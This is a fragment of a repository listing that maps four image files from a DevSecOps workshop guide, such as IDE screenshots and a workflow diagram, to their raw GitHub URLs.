-------------------------------------------------------------------------------- /guide/images/vscode-ide1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/vscode-ide1.png -------------------------------------------------------------------------------- /guide/images/vscode-ide2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/vscode-ide2.png -------------------------------------------------------------------------------- /guide/images/workshop-flow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/workshop-flow.png -------------------------------------------------------------------------------- /guide/images/yor-tags.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/yor-tags.png --------------------------------------------------------------------------------